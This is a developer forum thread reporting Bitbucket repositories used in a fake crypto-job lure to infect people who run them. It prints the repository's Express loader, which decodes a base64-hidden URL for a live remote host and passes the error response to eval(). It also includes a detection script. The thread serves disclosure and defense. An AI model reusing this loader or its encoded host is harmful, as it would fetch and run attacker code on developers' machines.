This repo contains dangerous JavaScript code to download malware

harsh0707051 January 28, 2025


https://bitbucket.org/sarostechwork/futuremike/src/main/


Some guy reached out via LinkedIn for so-called crypto projects and is urging people to run on bare metal instead of Docker. I found https://github.com/primno/dpapi to be a malicious package which is downloaded by the project. Reddit thread

https://tria.ge/250122-je84vawkfj/behavioral18 says it downloads an executable. 

Note: As a security researcher, I always run everything inside a VM or Docker, so I am safe, but if you are reading this and have executed it without Docker or a VM, I urge you to change all your banking, crypto and internet passwords. But before that, wipe out the entire system and reinstall everything.

2 answers

0 votes
Andy Heinzer
Atlassian Team
January 29, 2025

Hi @harsh0707051 

Thanks for reporting this to us.  This repo has been taken down.

harsh0707051 January 29, 2025

@Andy Heinzer Here is another such repository. Please take it down as well. :)

https://bitbucket.org/mike_2025/dex_v2_mvp/src/main/

Based on the analysis, it seems like this infects the system in the following way:

https://bitbucket.org/mike_2025/dex_v2_mvp/src/43c1745d5cd72c9a44fc3390a42e212c00860ed8/server/controllers/userController.js?at=main#lines-216

The JavaScript function calls a pretty well hidden host with the code below, and upon getting the error result (which this URL is throwing, and which can be a command & control center / dynamic IP host by a malicious actor), the result is obscured code. That result might be downloading something which they are decrypting with https://github.com/primno/dpapi, and that's why https://tria.ge/250122-je84vawkfj/behavioral18 might've tagged it for potential malware based on behaviour analysis.

```javascript
// Server-side (Express) code as found in the repository.
const axios = require("axios");

// Base64-encoded URL of the remote host, decoded at runtime with atob().
const JWT_KEY = "aHR0cDovL2JsYXN0YXBpLm9yZy9hcGkvc2VydmljZS90b2tlbi8xMWFiNzU5ZDE4OWRjOGJjMjM4Y2IyNTI1ZjA1Yjg4Yw==";

const getToken = (async () => {
  await axios.get(atob(JWT_KEY))
    .then(res => res.data)
    // The host answers with an HTTP error whose body is obfuscated JavaScript,
    // which is then executed here via eval().
    .catch(err => eval(err.response.data));
})();
```


Since it is running on the server side in Express.js, it just downloads an arbitrary obscure JavaScript payload and further downloads malware from that.

And that's how they are infecting users!!
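As an added example (not code from the repositories or from the poster), here is a small Node.js static check for the two traits described above: a base64 string literal that decodes to a URL, and eval() applied to an HTTP error response body. The sample source and the placeholder URL http://example.invalid/api/token are constructed for the example and assume Node's Buffer API.

```javascript
// Added example: static check for the loader pattern discussed above
// (base64-hidden URL + eval of an error response body). Not code from the
// repositories in this thread; the sample input and URL below are constructed.

// A quoted run of base64 characters long enough to hide a URL.
const BASE64_LITERAL = /["'`]([A-Za-z0-9+/]{12,}={0,2})["'`]/g;
// eval() whose argument is the body of an HTTP response object, e.g. eval(err.response.data).
const EVAL_OF_RESPONSE = /\beval\s*\(\s*\w+(?:\.\w+)*\.response\.data\s*\)/;

// Decode a base64 literal and return the URL it hides, or null if it is not a URL.
function decodeBase64Url(literal) {
  const decoded = Buffer.from(literal, 'base64').toString('utf8');
  return /^https?:\/\/\S+$/.test(decoded) ? decoded : null;
}

// Scan JavaScript source text line by line and report suspicious findings.
function scanSource(source) {
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    for (const match of line.matchAll(BASE64_LITERAL)) {
      const url = decodeBase64Url(match[1]);
      if (url) findings.push({ line: idx + 1, kind: 'base64-url', detail: url });
    }
    if (EVAL_OF_RESPONSE.test(line)) {
      findings.push({ line: idx + 1, kind: 'eval-of-response', detail: line.trim() });
    }
  });
  return findings;
}

// Constructed sample mirroring the shape of the snippet above; the URL is a placeholder.
const SAMPLE_URL = 'http://example.invalid/api/token';
const SAMPLE_SOURCE = [
  `const JWT_KEY = "${Buffer.from(SAMPLE_URL).toString('base64')}";`,
  'const getToken = (async () => {',
  '  await axios.get(atob(JWT_KEY))',
  '    .then(res => res.data)',
  '    .catch(err => eval(err.response.data));',
  '})();',
  'const greeting = "aGVsbG8gd29ybGQ=";', // benign base64 ("hello world"), must not be flagged
].join('\n');

// Prints two findings: the hidden URL on line 1 and the eval() on line 5.
if (typeof require === 'function' && require.main === module) {
  console.log(JSON.stringify(scanSource(SAMPLE_SOURCE), null, 2));
}
```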

Andy Heinzer
Atlassian Team
January 30, 2025

Thanks @harsh0707051 

I relayed this to my team. They have taken down the Bitbucket repo and suspended the user in question.

0 votes
Mikael Sandberg
Community Leader
January 28, 2025

Hi @harsh0707051,

Welcome to Atlassian Community!

You can report this to abuse@atlassian.com. The mailbox will never respond to submissions, but the info sent there is reviewed by Atlassian's anti-abuse team. 
